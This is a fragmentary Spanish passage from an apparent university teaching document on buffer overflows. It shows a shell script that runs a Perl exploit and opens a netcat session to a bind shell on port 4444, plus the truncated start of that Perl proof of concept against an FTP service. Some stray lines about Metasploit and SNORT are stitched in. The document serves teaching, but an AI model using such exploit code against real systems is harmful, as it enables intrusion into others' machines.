Professional Documents
Culture Documents
INGENIERIA DE TELECOMUNICACIONES
Para verificar que este es el caso, se ha enviado un buffer de datos con 966
0x41 , 4 0x42, y 1000 0x43.
flujo del aplicativo atacado; sin embargo, una alternativa es utilizar algunas
herramientas que existen para generarlo, metasploit cuenta con un generador
de shellcode muy til.
Este cdigo contiene 308 bytes, de un bind shell en el puerto 4444. Un bind
shell es un programa que espera conexiones en dicho puerto y una vez que
alguien accede se le entrega una lnea interactiva de comandos. La siguiente
captura muestra el resultado final de la ejecucin del exploit.
Note como se ha obtenido una lnea de comandos interactiva. A continuacin
se muestra el archivo autoPWN.sh.
#!/bin/bash
perl ./exploit.pl
echo "Don't worry we will get the shell for you"
nc 192.168.XX.XX 4444
Ya habr notado que todo lo que hace este script es llamar a otro script, y
luego llamar a netcat para acceder a la lnea de comandos interactiva. A
continuacin se muestra el cdigo de exploit.pl.
#!/usr/bin/perl
# THIS FILE IS A POC FOR UDE@, TO TEACH BOF.
use LWP::Socket;
use strict;
# SOME NICE VARIABLES
my $victim = '192.168.XX.XXX'; #please hardcode this
my $victim_port = '21';
#MAIN
my $buffer = "\x41"x965;
$buffer .= "\x81\x42\xF3\x77";#77D5AF0A
Metasploit
Metasploit es un framework diseado para auditar sistemas y desarrollar
herramientas de auditora ofensiva. Est licenciado bajo GPL y permite a sus
usuarios utilizar su enorme base de datos de vulnerabilidades conocidas para
SNORT in line
1 Tomado de Wikipedia http://es.wikipedia.org/wiki/SNORT